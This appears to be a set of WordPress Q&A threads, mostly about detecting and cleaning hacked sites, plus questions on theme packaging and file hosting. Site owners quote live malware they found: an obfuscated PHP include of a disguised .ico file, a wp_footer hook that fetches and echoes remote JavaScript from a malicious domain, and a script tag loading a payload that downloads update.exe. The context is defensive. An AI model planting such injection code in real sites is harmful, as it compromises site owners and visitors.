I wonder, how websites like https://wpsec.com can find my wordpress themes and plugins.
When I tried to access the directory mydomain.com/wp-content/themes/my-theme, I got 404 but how do they get this.
Are my firewalls and security malewares plugins are useless?
After thinking about this my conjecture on how this works is this:
Almost all plugins/themes have .css and/or .js files. For plugins these are stored in the plugin's installation directory - .../wp-content/plugins/some-plugin-directory. The URLs of the HTTP requests for these would look this - httpx://some.host.com/wp-content/plugins/some-plugin-directory/js/some-javascript-file.js. From these requests wpsec can extract 'some-plugin-directory' which is what WordPress uses to identify a plugin. If the plugin is in the WordPress repository then wpsec can download the entire plugin and provide more information. If the plugin is proprietary then wpsec probably only has access to the publicly accessible .js and .css files. On my installation I have a proprietary plugin and wpsec found the installation directory - 'some-plugin-directory' but did not report the version probably because it cannot access the readme.txt or any of the .php files. So, if this conjecture is correct if a plugin only has PHP i.e. no .css, no .js and also no images stored in its installation directory then wpsec should not be able to detect it. Of course the same reasoning applies to themes.
Related
I have created a theme on wordpress on local with xampp and wordpress.org but now i dont know which files should i .zip so others can use my theme. I tried with those files below to test if the theme works but its not working when i upload it as a theme in wordpress:
Which files should i include in the .zip archive so the theme will be installable and have everything on it such as pages posts etc...
You only need the /wp-content/themes/YOUR-THEME folder. Everything else should already be there on other people's WordPress installations, as they are core files. Also never ever ever ever ever include your wp-config.php file with anybody. That contains sensitive database credentials that, if compromised, can give anybody access to everything on your site.
It looks like my wordpress site has been hacked. Following code snipt was in index.php, wp-config.php
<?php
/*6b9bb*/
#include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";
/*6b9bb*/
I have changed:
WP Admin URL and put strong password username
changed cpanel/FTP password with strong one
Implemented iTheme Security
Updated Wordpress to latest (themes and plugins)
However, the code again repeated. What can be good solutions?
p.s. I am using siteground.
Thanks
Yeah someone is including a .ico file (open it with a Text Editor, and you will see it is some php Code and no real ico file)
/home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico
Somehow despite your changes of host and passwords you hacker is able to get in, once they are in they can setup all sorts of backdoors to keep access, any .php file of theirs can do this.
At the moment closing the initial front-door they use is your sole occupation.
Follow the advice in this article:
https://codex.wordpress.org/FAQ_My_site_was_hacked
And then: https://codex.wordpress.org/Hardening_WordPress
Here are some links about backdoors:
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/
http://ottopress.com/2009/hacked-wordpress-backdoors/
Source: https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/
Once the site is hacked, in my opinion, resistance is futile. No scan or tool will help you. you'll have to replace all files with fresh downloads. mostly it's straight forward:
Backup the whole installation (just in case)
Download the complete wp-content/uploads folder
Make a Screenshot or save the page with the currently active plugins
Delete ALL files
Get a fresh wordpress setup and extract it
Download a fresh copy of your theme and child-theme (recreate the previous setup)
Copy the previous wp-config.php to this fresh install. but take a GOOD look at it. usually it also has some virus/backdoors in it. usually easy to see and remove. now you're already connected with your DB
Examine the saved uploads folder for files that shouldnt be there, like php files. then upload it to the new folder
Reinstall all plugins, fresh downloads
I faced this problem too, and step by step I did the steps below:
Cleaning the injected code, manually
Changing all the passwords
Hiding the WP admin dashboard URL
Limiting the login attempts
Installing security plugins (Sucuri, Wordfence security)
Contracting with Sucuri plan
The good thing is to install Wordfence security plugin, run the scan, then you will detect all the files with the injected code and you can clean the injected code manually.
you can also visit this link too
https://naderzad.info/web-development/wordpress-code-injection/
On a Wordpress site, I would like to make some files available for downloading, and some of these, I've just found out, cannot be added to the media library. Namely, it's not letting me upload a zipped folder, a Sketchup (.skp) file, and an HTML file.
If I want to make files available through a Wordpress site that Wordpress does not support, what are my options? Would it be possible to have a file stored elsewhere and still be downloadable through a link on the Wordpress site? I'm new to Wordpress, but (correct me if I'm wrong) Wordpress.com, where the site in question is hosted, does not seem to allow plugins.
Wordpress.com is essentially a blogging platform unlike wordpress.org where you can download the wordpress package and install it on a server.Most of blogging service providers wont allow you to upload files to there server due to security issue like Shells and software piracy.
It is better to host your files somewhere else and public link to your blog. Another solution is to buy a hosting account and install wordpress software, where you can upload and store files you need without any restriction.(According to providers usage policies)
I have just finished uploading the content of my wordpress site to google cloud. But I am now facing a huge limitation due to no I/O ability. I am posting this to see if anybody has devised a work-around.
I need to install Headway Themes and upload a package of buttons (Max Buttons Pro), I also have troubles with installing the s2member Pro edition.
Any workarounds for this?
Themes & Plugins have to be downloaded and extracted into you wordpress project folder and re-uploaded to appengine.
Typical workflow:
Download desired theme (Usually as a .zip file)
Extract the .zip file into wordpress/wp-content/themes (you will see default themes here...theres also a folder for plugins)
Upload your project to appengine (Don't worry this will not overwrite your data)
You will then see the themes or plugins show up on your wordpress dashboard.
this script keeps coming back to my wp-load.php file in public_html folder:
function pluginAuth(){
echo(wp_remote_retrieve_body(wp_remote_get('http://jquerys.net/jquery-1.6.3.min.js')));
}
add_action('wp_footer', 'pluginAuth');
this directs to a virus site "jquerys.net"
What can be the solution. deleting the fucntion from wp-load.php does not eliminate it, as it regenrates on refreshing any page of my blog.
kindly help
There could be malicious code injected into any of your wordpress files. You will need to go through all files especially inside your theme to look for code or files / folders that shouldn't be there.
After this you can use this article to make your build more secure:
http://codex.wordpress.org/Hardening_WordPress
Has been very useful to me in the past for preventing this sort of thing from happening again. You can do as many or as little of the security measures as you like.
I would definitely recommend doing everything from the Securing wp-admin section.
Most probably you have some infected or malicious file in wp-ulpoads folder, check there also for any file type, different than image or documents.
Also important: check your current theme functions.php file for malicious code, often hacked themes (i.e. downloaded via bittorent websites of mafiashare websites) inject such code, search for any curl() requests, actually not only in functions.php, but in files (if your theme has them) options.php or settings.php, etc.
You seem to have an infected WordPress installation. Use Theme Authenticity Checker OR Exploit Scanner plugins for automatically detecting potential malicious files that might be the culprit.
You can also try the free scan service of Sucuri.
Once you are done with the identification of the corrupted files, replace them with their official counterparts which you can get from WordPress.org.
As a defensive measure, install WordPress File Monitor Plus plugin - as it emails each time some file is changed. This will allow you to quickly revert any changes that some hacker/script makes in the future!
i was able to detect the malicious script. it was in the public_html folder. the file was "main.php" which is not in the default installation and also it does not contribute to any theme or plugin. after deleting all the unverfied plugins, i deleted this file and deleted the code in the wp-load.php.
at first when i did not deleted the "main.php" file. the 'function' in the wp-load kept coming back. but after deleting "main.php" file, i have rid myself from this virus.
There is new virus in WP
There's a downloading of a update.exe initiated by line
<script src="//socialstatsplugin.com/jqury.js"></script>
i Have done some reviews for this kind of virus.
Just go to your WP folder and check if any unwanted hidden file and when you browse through that , the files are unreadable.
As said Just do
DELETE FROM wp_options WHERE option_name like '%wp_data_newa%'
and delete all unwanted hidden folder within any folder. It worked till now. Hope it will help. Never knows the future.
Thanks